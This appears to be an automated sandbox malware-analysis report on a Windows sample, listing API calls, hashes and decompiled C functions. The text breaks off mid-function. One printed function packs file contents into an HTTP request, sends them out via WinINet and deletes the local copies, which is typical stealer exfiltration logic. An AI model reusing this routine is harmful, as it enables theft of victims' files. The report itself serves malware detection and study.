LocalFree.KERNEL32(00000000), ref: 004059CF
LocalFree.KERNEL32(00407BAF), ref: 004059D8
LocalFree.KERNEL32(?), ref: 004059E1
LocalFree.KERNEL32(?), ref: 004059EA
LocalFree.KERNEL32(?), ref: 004059F3
LocalFree.KERNEL32(?), ref: 004059FC
LocalFree.KERNEL32(?), ref: 00405A05
LocalFree.KERNEL32(?), ref: 00405A0E
LocalFree.KERNEL32(?), ref: 00405A17

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A40
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A49
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A52
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A5B
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A64
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A6D
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A76
LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A85
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A8E
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A97
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AA0
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AA9
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AB0
LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AC1
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405ACA
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AD3
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405ADC
LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AE5
LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AF3
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AFC
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B05
LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B16
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B1F
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B26
LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B37

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Local$Free$Alloc$lstrlen$GlobalLibraryLoadOpen
String ID:
API String ID: 3736288983-0
Opcode ID: acb05a7f8a70a2da554c802db9e5f0e9240b428b10ae7605c4d463cf284dd9f3
Instruction ID: f35946c0f576b0545b5d2f7ca60a1d17271964e093f6211ee75f8335e655f3b5
Opcode Fuzzy Hash: acb05a7f8a70a2da554c802db9e5f0e9240b428b10ae7605c4d463cf284dd9f3
Instruction Fuzzy Hash: E1F1C372900225EFDB149BA6DE48EAEBB75EB48310F044535F905B32A0DB746D21CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 022B6CE3 Relevance: 66.9, APIs: 31, Strings: 7, Instructions: 395
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 022B057F: LoadLibraryW.KERNEL32(0040C040), ref: 022B058A
Part of subcall function 022B057F: LoadLibraryW.KERNEL32(0040C114), ref: 022B061E

CoInitialize.OLE32(00000000), ref: 022B6CF7

Part of subcall function 022B9A36: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,?,00000000,00000000), ref: 022B9A65

CreateMutexW.KERNEL32(00000000,00000000,iqroq5112542785672901323), ref: 022B6D62
ExitProcess.KERNEL32 ref: 022B6D6C
LocalFree.KERNEL32(00000000), ref: 022B6E71
LocalFree.KERNEL32(00000000), ref: 022B6E78
LocalFree.KERNEL32(00000000), ref: 022B6E7F
LocalFree.KERNEL32(00000000), ref: 022B6EEA
LocalFree.KERNEL32(00000000), ref: 022B6EF5
LocalFree.KERNEL32(00000000), ref: 022B6F14
LocalFree.KERNEL32(?), ref: 022B6F1D
LocalFree.KERNEL32(?), ref: 022B6F26
ExitProcess.KERNEL32 ref: 022B6F75
ExitProcess.KERNEL32 ref: 022B6FAB

Strings

iqroq5112542785672901323, xrefs: 022B6D4D, 022B6D52, 022B6D5F
, xrefs: 022B6DA3
, xrefs: 022B6D97
xzn, xrefs: 022B6FE1, 022B7015
, xrefs: 022B6D8B
afb5c633c4650f69312baef49db9dfa4, xrefs: 022B6CFD
, xrefs: 022B6DB6

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$ExitProcess$LibraryLoad$ByteCharCreateInitializeMultiMutexWide
String ID: $ $ $ $afb5c633c4650f69312baef49db9dfa4$iqroq5112542785672901323$xzn
API String ID: 1864685469-1705126799
Opcode ID: c558d2bf8f2b5ab25cdbf621f3a43ffca48a0fa9f05b2738d3e56535cb160897
Instruction ID: 39e255d07d38e6ba621141f63eeaf90e2f81c860d555478b3955b9ea44927156
Opcode Fuzzy Hash: c558d2bf8f2b5ab25cdbf621f3a43ffca48a0fa9f05b2738d3e56535cb160897
Instruction Fuzzy Hash: 64D1A971A102149BDB05ABF2DD58ABE77B6AF48340F004838E605B73A4DF789D518F69

Uniqueness

Uniqueness Score: -1.00%

Function 00407EDB Relevance: 53.0, APIs: 26, Strings: 4, Instructions: 477
networkfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 42%

			E00407EDB(short* __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20, intOrPtr _a24) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				signed int _v32;
				void* _v36;
				char _v40;
				void _v44;
				void _v48;
				void* _v52;
				void* _t109;
				void* _t112;
				signed int _t113;
				signed int _t115;
				void* _t119;
				void* _t121;
				void* _t123;
				void* _t124;
				void* _t128;
				void* _t129;
				void* _t131;
				void* _t132;
				char _t148;
				void* _t164;
				void* _t166;
				long _t168;
				long _t169;
				signed int _t174;
				void* _t178;
				void* _t179;
				void* _t180;
				void* _t182;
				void* _t183;
				void* _t186;
				void* _t187;
				void* _t188;
				void* _t189;
				void* _t190;
				void* _t191;
				void* _t209;
				void* _t211;
				void* _t212;
				void* _t215;
				void* _t216;
				void* _t217;
				void* _t218;
				void* _t220;
				void* _t223;
				void* _t224;
				intOrPtr _t226;
				intOrPtr* _t227;
				signed int _t229;
				void* _t282;
				intOrPtr _t285;
				intOrPtr _t286;
				intOrPtr _t288;
				intOrPtr _t293;
				intOrPtr _t294;
				intOrPtr _t296;
				intOrPtr _t297;
				intOrPtr _t300;
				intOrPtr _t301;
				intOrPtr _t302;
				intOrPtr _t303;
				intOrPtr _t306;
				intOrPtr _t308;
				intOrPtr _t309;
				intOrPtr _t312;
				intOrPtr _t313;
				intOrPtr _t314;
				intOrPtr _t315;
				intOrPtr _t317;
				void* _t318;
				signed int _t319;
				void* _t320;
				void* _t321;
				void* _t323;
				void* _t326;
				signed short* _t328;
				void* _t329;
				void* _t331;
				void* _t333;
				void** _t338;
				void* _t339;

				_v20 = __edx;
				_t327 = __ecx;
				_t224 =  *((intOrPtr*)( *0x40e044))(0x40, 0xc350);
				_v24 = _t224;
				_t318 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_v28 = _t318;
				if( *__ecx != 0x68) {
					L14:
					return 0;
				}
				_t109 = 0x74;
				if( *((intOrPtr*)(__ecx + 2)) != _t109 ||  *((intOrPtr*)(__ecx + 4)) != _t109 ||  *((short*)(__ecx + 6)) != 0x70) {
					goto L14;
				} else {
					_t7 = _t327 + 8; // 0x4589d0ff
					_v32 =  *_t7 & 0x0000ffff;
					_t112 =  *((intOrPtr*)( *0x40e18c))(__ecx,  *0x40e3ec);
					_v16 = 0x2f;
					_t282 = 0;
					_t10 = _t112 + 6; // 0x6
					_t328 = _t10;
					_t113 =  *_t328 & 0x0000ffff;
					_t229 = _t113;
					if(_t113 == _v16) {
						L7:
						_t115 =  *((intOrPtr*)( *0x40e08c))(_t318);
						_t319 = _a4;
						_v52 =  &(_t328[_t115]);
						_t119 =  *((intOrPtr*)( *0x40e044))(0x40, _t319 << 0x15);
						_v8 = _t119;
						if(_t319 <= 0) {
							L11:
							_t121 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v8, 0xffffffff, 0, 0, 0, 0);
							_v16 = _t121;
							_t329 =  *((intOrPtr*)( *0x40e044))(0x40, _t319 << 0x14);
							_t123 =  *((intOrPtr*)( *0x40e044))(0x40, _t319 + _a12 << 0x14);
							_v12 = _t123;
							_t320 = _t123;
							_t124 = _v16;
							if(_t124 == 0) {
								L19:
								LocalFree(_v8);
								LocalFree(_t329);
								if(_a12 <= 0) {
									L32:
									_t128 =  *((intOrPtr*)( *0x40e044))(0x40, 0x100);
									_t285 =  *0x40e3dc; // 0x6da578
									_t129 = E0040A55D(_t128, _t285);
									_t286 =  *0x40e43c; // 0x6da628
									_t131 = E0040A55D(E0040A55D(_t129, _t286), _v20);
									_t288 =  *0x40e43c; // 0x6da628
									_t132 = E0040A55D(_t131, _t288);
									_v20 = _t132;
									_push( *((intOrPtr*)( *0x40e198))(_t132) + 1);
									_push(_v20);
									_push(_t320);
									if( *((intOrPtr*)( *0x40e004))() != 0) {
										_t320 = _t320 +  *((intOrPtr*)( *0x40e198))(_v20);
									}
									LocalFree(_v20);
									_v44 = 0x927c0;
									_v48 = 0x927c0;
									_t331 =  *((intOrPtr*)( *0x40e124))(L"rqwrwqrqwrqw", 0, 0, 0, 0);
									_v36 = _t331;
									InternetSetOptionW(_t331, 6,  &_v44, 4);
									InternetSetOptionW(_t331, 5,  &_v48, 4);
									if(_t331 == 0) {
										L45:
										_t333 = MultiByteToWideChar(0xfde9, 0, _t224,  *((intOrPtr*)( *0x40e198))(0) + 1, _t224, 0);
										_v52 = _t333;
										_t148 = _t333 + _t333;
										_v40 = _t148;
										_t321 =  *((intOrPtr*)( *0x40e044))(0x40, _t148);
										if(_t333 != 0) {
											MultiByteToWideChar(0xfde9, 0, _t224,  *((intOrPtr*)( *0x40e198))(_v52) + 1, _t224, _t321);
											 *((short*)(_v40 + _t321 - 2)) = 0;
										}
										if(_t321 != 0) {
											LocalFree(_t321);
										}
										LocalFree(_v28);
										LocalFree(_t224);
										LocalFree(_v12);
										return 1;
									} else {
										_t162 =  ==  ? 0x1bb : 0;
										_t163 = ( ==  ? 0x1bb : 0) & 0x0000ffff;
										_t164 =  *((intOrPtr*)( *0x40e180))(_t331, _v28, ( ==  ? 0x1bb : 0) & 0x0000ffff, 0x73, 0x50, 0, 0, 3, 0, 1);
										_v20 = _t164;
										if(_t164 == 0) {
											L44:
											InternetCloseHandle(_t331);
											goto L45;
										}
										_v40 = 0xc00000;
										_t248 =  ==  ? _v40 : 0x400000;
										_t166 =  *((intOrPtr*)( *0x40e0b8))(_t164,  *0x40e25c, _v52, 0, 0, _a24,  ==  ? _v40 : 0x400000, 0x73, 1);
										_t224 = _v24;
										_v52 = _t166;
										if(_t166 == 0) {
											L43:
											InternetCloseHandle(_v20);
											goto L44;
										}
										_t168 = _v12;
										_t169 =  *((intOrPtr*)( *0x40e08c))(_t320 - _t168);
										_t323 = _v52;
										if(HttpSendRequestW(_t323, _a20, _t169, _a20, _t168) == 0) {
											L42:
											InternetCloseHandle(_t323);
											_t331 = _v36;
											goto L43;
										}
										while(1) {
											_push( &_v32);
											_push(0xc350);
											_push(_t224);
											_push(_t323);
											if( *((intOrPtr*)( *0x40e0fc))() == 0) {
												goto L42;
											}
											_t174 = _v32;
											if(_t174 == 0) {
												goto L42;
											}
											 *((char*)(_t224 + _t174)) = 0;
										}
										goto L42;
									}
								}
								_t226 = _a12;
								_t338 = _a16 + 4;
								do {
									_t178 =  *((intOrPtr*)( *0x40e14c))( *_t338, 0);
									_v36 = _t178;
									_t49 = _t178 + 0x400; // 0x400
									_t179 =  *((intOrPtr*)( *0x40e044))(0x40, _t49);
									_t293 =  *0x40e3dc; // 0x6da578
									_t180 = E0040A55D(_t179, _t293);
									_t294 =  *0x40e43c; // 0x6da628
									_t182 = E0040A55D(E0040A55D(_t180, _t294), _v20);
									_t296 =  *0x40e3dc; // 0x6da578
									_t183 = E0040A55D(_t182, _t296);
									_t297 =  *0x40e444; // 0x6db0d0
									_t186 = E0040A55D(E0040A55D(E0040A55D(_t183, _t297),  *(_t338 - 4)), "\"");
									_t300 =  *0x40e3dc; // 0x6da578
									_t187 = E0040A55D(_t186, _t300);
									_t301 =  *0x40e3f0; // 0x6d68e0
									_t188 = E0040A55D(_t187, _t301);
									_t302 =  *0x40e3dc; // 0x6da578
									_t189 = E0040A55D(_t188, _t302);
									_t303 =  *0x40e3dc; // 0x6da578
									_t190 = E0040A55D(_t189, _t303);
									_v16 = _t190;
									_t191 =  *((intOrPtr*)( *0x40e198))(_t190);
									_v8 = _t191;
									_t54 = _t191 + 1; // 0x1
									_push(_v16);
									_push(_t320);
									if( *((intOrPtr*)( *0x40e004))() != 0) {
										_t320 = _t320 + _v8;
										if( *_t338 != 0) {
											_push(0);
											_push( &_v40);
											_push(_v36);
											_push(_t320);
											_push( *_t338);
											if( *((intOrPtr*)( *0x40e088))() != 0) {
												_t320 = _t320 + _v40;
											}
											CloseHandle( *_t338);
										}
									}
									if( *(_t338 - 4) != 0) {
										LocalFree( *(_t338 - 4));
									}
									if(_t338[1] != 0) {
										DeleteFileW(_t338[1]);
										LocalFree(_t338[1]);
									}
									LocalFree(_v16);
									_t338 =  &(_t338[4]);
									_t226 = _t226 - 1;
								} while (_t226 != 0);
								_t224 = _v24;
								goto L32;
							}
							_push(0);
							_push(0);
							_push(_t124);
							_push(_t329);
							_push(0xffffffff);
							_push(_v8);
							_push(0);
							_push(0xfde9);
							if( *((intOrPtr*)( *0x40e0e4))() != 0) {
								_push(_t329);
								if( *((intOrPtr*)( *0x40e198))() > 0) {
									_push(_v16);
									_push(_t329);
									_push(_v12);
									if( *((intOrPtr*)( *0x40e004))() != 0) {
										_t320 = _v16 - 1 + _v12;
									}
								}
								goto L19;
							}
							LocalFree(_v8);
							LocalFree(_t224);
							LocalFree(_t329);
							LocalFree(_v28);
							goto L14;
						} else {
							_t227 = _a8;
							_v16 = _t319;
							_t326 = _t119;
							do {
								_t209 = E0040A4C2(_v20);
								_t306 =  *0x40e3f8; // 0x6e7ad8
								_t339 = _t209;
								_t211 = E0040A503(E0040A503(_t326, _t306), _t339);
								_t308 =  *0x40e350; // 0x6e7bd8
								_t212 = E0040A503(_t211, _t308);
								_t309 =  *0x40e340; // 0x6b3460
								_t215 = E0040A503(E0040A503(E0040A503(_t212, _t309),  *_t227), "\"");
								_t312 =  *0x40e350; // 0x6e7bd8
								_t216 = E0040A503(_t215, _t312);
								_t313 =  *0x40e35c; // 0x6b1890
								_t217 = E0040A503(_t216, _t313);
								_t314 =  *0x40e350; // 0x6e7bd8
								_t218 = E0040A503(_t217, _t314);
								_t315 =  *0x40e350; // 0x6e7bd8
								_t220 = E0040A503(E0040A503(_t218, _t315),  *((intOrPtr*)(_t227 + 4)));
								_t317 =  *0x40e350; // 0x6e7bd8
								_t326 = E0040A503(_t220, _t317);
								LocalFree(_t339);
								_t25 =  &_v16;
								 *_t25 = _v16 - 1;
								_t227 = _t227 + 0xc;
							} while ( *_t25 != 0);
							_t224 = _v24;
							_v8 = _t326;
							_t319 = _a4;
							goto L11;
						}
					} else {
						_t223 = 0;
						do {
							_t282 = _t282 + 1;
							 *(_t223 + _t318) = _t229;
							_t223 = _t282 + _t282;
							_t229 =  *(_t223 + _t328) & 0x0000ffff;
						} while (_t229 != _v16);
						goto L7;
					}
				}
			}

0x00407ef0
0x00407ef3
0x00407efd
0x00407f06
0x00407f0f
0x00407f11
0x00407f14
0x004080f3
0x00000000
0x004080f3
0x00407f1c
0x00407f21
0x00000000
0x00407f3c
0x00407f3c
0x00407f46
0x00407f4f
0x00407f51
0x00407f58
0x00407f5a
0x00407f5a
0x00407f5d
0x00407f60
0x00407f66
0x00407f7c
0x00407f82
0x00407f84
0x00407f90
0x00407f9b
0x00407f9d
0x00407fa2
0x00408069
0x0040807f
0x0040808f
0x00408097
0x004080a8
0x004080aa
0x004080ad
0x004080af
0x004080b4
0x0040811f
0x00408122
0x00408129
0x00408133
0x00408275
0x00408281
0x00408283
0x0040828b
0x00408290
0x004082a2
0x004082a7
0x004082af
0x004082c1
0x004082c7
0x004082c8
0x004082cb
0x004082d0
0x004082dc
0x004082dc
0x004082e1
0x004082f2
0x004082f5
0x00408304
0x0040830f
0x00408312
0x00408321
0x00408329
0x00408406
0x0040842a
0x0040842c
0x0040842f
0x00408435
0x0040843a
0x0040843e
0x0040845d
0x00408464
0x00408464
0x0040846b
0x0040846e
0x0040846e
0x00408477
0x0040847e
0x00408487
0x00000000
0x0040832f
0x0040834d
0x00408350
0x00408358
0x0040835a
0x0040835f
0x004083ff
0x00408400
0x00000000
0x00408400
0x00408379
0x00408380
0x00408396
0x00408398
0x0040839b
0x004083a0
0x004083f6
0x004083f9
0x00000000
0x004083f9
0x004083a2
0x004083b8
0x004083ba
0x004083c6
0x004083ec
0x004083ed
0x004083f3
0x00000000
0x004083f3
0x004083da
0x004083e2
0x004083e3
0x004083e4
0x004083e5
0x004083ea
0x00000000
0x00000000
0x004083cf
0x004083d4
0x00000000
0x00000000
0x004083d6
0x004083d6
0x00000000
0x004083da
0x00408329
0x0040813c
0x0040813f
0x00408142
0x0040814b
0x00408153
0x00408156
0x0040815f
0x00408161
0x00408169
0x0040816e
0x00408180
0x00408185
0x0040818d
0x00408192
0x004081b0
0x004081b5
0x004081bd
0x004081c2
0x004081ca
0x004081cf
0x004081d7
0x004081dc
0x004081e4
0x004081f0
0x004081f3
0x004081fb
0x004081fe
0x00408202
0x00408205
0x0040820a
0x0040820c
0x00408212
0x0040821c
0x0040821e
0x0040821f
0x00408222
0x00408223
0x00408229
0x0040822b
0x0040822b
0x00408230
0x00408230
0x00408212
0x0040823a
0x0040823f
0x0040823f
0x00408249
0x0040824e
0x00408257
0x00408257
0x00408260
0x00408266
0x00408269
0x00408269
0x00408272
0x00000000
0x00408272
0x004080be
0x004080bf
0x004080c0
0x004080c1
0x004080c2
0x004080c4
0x004080c7
0x004080c8
0x004080d1
0x004080ff
0x00408104
0x00408106
0x0040810e
0x0040810f
0x00408116
0x0040811c
0x0040811c
0x00408116
0x00000000
0x00408104
0x004080d6
0x004080dd
0x004080e4
0x004080ed
0x00000000
0x00407fa8
0x00407fa8
0x00407fab
0x00407fae
0x00407fb0
0x00407fb3
0x00407fb8
0x00407fc0
0x00407fcb
0x00407fd0
0x00407fd8
0x00407fdd
0x00407ffa
0x00407fff
0x00408007
0x0040800c
0x00408014
0x00408019
0x00408021
0x00408026
0x00408038
0x0040803d
0x0040804b
0x0040804d
0x00408053
0x00408053
0x00408057
0x00408057
0x00408060
0x00408063
0x00408066
0x00000000
0x00408066
0x00407f68
0x00407f68
0x00407f6a
0x00407f6a
0x00407f6b
0x00407f6f
0x00407f72
0x00407f76
0x00000000
0x00407f6a
0x00407f66

APIs

LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 0040804D
LocalFree.KERNEL32(?,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 004080D6
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 004080DD
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 004080E4
LocalFree.KERNEL32(00000001,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 004080ED
LocalFree.KERNEL32(?,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 00408122
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 00408129
CloseHandle.KERNEL32(?,?,?,?,?,?,00409B89,00000001,?), ref: 00408230
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 0040823F
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 0040824E
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 00408257
LocalFree.KERNEL32(0000002F,?,?,?,?,?,00409B89,00000001,?), ref: 00408260
lstrcpyn.KERNEL32(00000000,00000000,00000001,?,?,?,?,?,00409B89,00000001,?), ref: 004082CC
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 004082E1
InternetSetOptionW.WININET(00000000,00000006,?,00000004), ref: 00408312
InternetSetOptionW.WININET(00000000,00000005,?,00000004), ref: 00408321
HttpSendRequestW.WININET(?,00000001,00000000), ref: 004083C2
InternetCloseHandle.WININET(?), ref: 004083ED
InternetCloseHandle.WININET(00000000), ref: 004083F9
InternetCloseHandle.WININET(00000000), ref: 00408400
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001,?,?,?,?,?,00409B89,00000001,?), ref: 00408422
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001,?,?,?,?,?,00409B89,00000001,?), ref: 0040845D
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 0040846E
LocalFree.KERNEL32(00000001,?,?,?,?,?,00409B89,00000001,?), ref: 00408477
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 0040847E
LocalFree.KERNEL32(?,?,?,?,?,?,00409B89,00000001,?), ref: 00408487

Strings

/, xrefs: 00407F51
`4k, xrefs: 00407FDD
rqwrwqrqwrqw, xrefs: 004082FD
hm, xrefs: 004081C2

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$Internet$CloseHandle$ByteCharMultiOptionWide$DeleteFileHttpRequestSendlstrcpyn
String ID: /$`4k$rqwrwqrqwrqw$hm
API String ID: 295309298-4247725572
Opcode ID: cc2c2d685f84a46da143ceb1b72dd46e7f22fcb3915adf77100fbecd680e3ecb
Instruction ID: 6c99c45f28bfee67641de8d5d70fad00062f969ed25daf8f75b78222567e1072
Opcode Fuzzy Hash: cc2c2d685f84a46da143ceb1b72dd46e7f22fcb3915adf77100fbecd680e3ecb
Instruction Fuzzy Hash: 84029F71A00215AFDF04EFB6DE45E6E77B5FB88300F008839E915B7290DB78AD118B68

Uniqueness

Uniqueness Score: -1.00%

Function 022B4B2A Relevance: 49.2, APIs: 39, Instructions: 476
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LocalFree.KERNEL32(00000000), ref: 022B50C2

Part of subcall function 022B9958: LocalFree.KERNEL32(00000000,?,022B32BA,00000002,?), ref: 022B99BD

LocalFree.KERNEL32(00000000), ref: 022B4F20
LocalFree.KERNEL32(?), ref: 022B4F29
LocalFree.KERNEL32(?), ref: 022B4F32
LocalFree.KERNEL32(?), ref: 022B4F39
LocalFree.KERNEL32(00000000), ref: 022B4F43
LocalFree.KERNEL32(?), ref: 022B4F4C
LocalFree.KERNEL32(?), ref: 022B4F55
LocalFree.KERNEL32(?), ref: 022B4F5E
LocalFree.KERNEL32(?), ref: 022B4F67
LocalFree.KERNEL32(?), ref: 022B4F70
LocalFree.KERNEL32(?), ref: 022B4F79
LocalFree.KERNEL32(?), ref: 022B4F82
LocalFree.KERNEL32(?), ref: 022B4F8B

Part of subcall function 022B9A77: GlobalFree.KERNEL32(022B1F22), ref: 022B9AC4

LocalFree.KERNEL32(?), ref: 022B4FB4
LocalFree.KERNEL32(?), ref: 022B4FBD
LocalFree.KERNEL32(?), ref: 022B4FC6
LocalFree.KERNEL32(?), ref: 022B4FCF
LocalFree.KERNEL32(?), ref: 022B4FD8
LocalFree.KERNEL32(?), ref: 022B4FE1
LocalFree.KERNEL32(?), ref: 022B4FEA
LocalFree.KERNEL32(?), ref: 022B4FF9
LocalFree.KERNEL32(?), ref: 022B5002
LocalFree.KERNEL32(?), ref: 022B500B
LocalFree.KERNEL32(?), ref: 022B5014
LocalFree.KERNEL32(?), ref: 022B501D
LocalFree.KERNEL32(?), ref: 022B5024
LocalFree.KERNEL32(?), ref: 022B5035
LocalFree.KERNEL32(?), ref: 022B503E
LocalFree.KERNEL32(?), ref: 022B5047
LocalFree.KERNEL32(?), ref: 022B5050
LocalFree.KERNEL32(?), ref: 022B5059
LocalFree.KERNEL32(?), ref: 022B5067
LocalFree.KERNEL32(?), ref: 022B5070
LocalFree.KERNEL32(?), ref: 022B5079
LocalFree.KERNEL32(?), ref: 022B508A
LocalFree.KERNEL32(?), ref: 022B5093
LocalFree.KERNEL32(00000000), ref: 022B509A
LocalFree.KERNEL32(?), ref: 022B50AB

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Free$Local$Global
String ID:
API String ID: 67877634-0
Opcode ID: 0f12c4ef2a00073fdc66328a61890da27d8bcc0520ef2ea85460475b67c8d6ed
Instruction ID: f2a1ef6f62d6ce736fedd44927f4a77ed92c8e0e1cdf86895791f9951ce577a4
Opcode Fuzzy Hash: 0f12c4ef2a00073fdc66328a61890da27d8bcc0520ef2ea85460475b67c8d6ed
Instruction Fuzzy Hash: 52F1B672910225AFDB159BE6DE48EEEBB75EF48310F044824F905B7260CB705D60CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406D26 Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 419
fileCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E00406D26(intOrPtr* __ecx, intOrPtr* __edx, intOrPtr _a4, char* _a8) {
				intOrPtr _v8;
				void* _v12;
				signed int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int _v60;
				intOrPtr _v64;
				void* _v68;
				void* _v72;
				signed int _v76;
				intOrPtr _v80;
				intOrPtr* _v84;
				intOrPtr* _v88;
				void* _v92;
				intOrPtr _t104;
				intOrPtr _t105;
				intOrPtr _t106;
				intOrPtr _t107;
				intOrPtr _t108;
				void* _t110;
				void* _t111;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t132;
				intOrPtr* _t133;
				void* _t140;
				void* _t142;
				char* _t144;
				void* _t146;
				void* _t147;
				void* _t160;
				int _t163;
				void* _t165;
				signed int _t167;
				void* _t190;
				void* _t191;
				void* _t196;
				void* _t209;
				void* _t210;
				signed int _t212;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t216;
				void* _t228;
				void* _t240;
				signed int _t241;
				void* _t264;
				intOrPtr _t265;
				void* _t267;
				void* _t270;
				void* _t271;
				intOrPtr _t273;
				intOrPtr* _t276;
				void* _t278;

				_v88 = __edx;
				_v84 = __ecx;
				if(_a8 == 0) {
					L50:
					return 0;
				}
				_t104 =  *0x40e38c; // 0x6d5d40
				_v76 = _v76 & 0x00000000;
				_v48 = _t104;
				_t105 =  *0x40e380; // 0x6d5d70
				_v80 = _t105;
				_t106 =  *0x40e2cc; // 0x6e7c98
				_v52 = _t106;
				_t107 =  *0x40e320; // 0x6e7cb8
				_v56 = _t107;
				_t108 =  *0x40e384; // 0x6d5848
				_v64 = _t108;
				_t110 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_t111 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
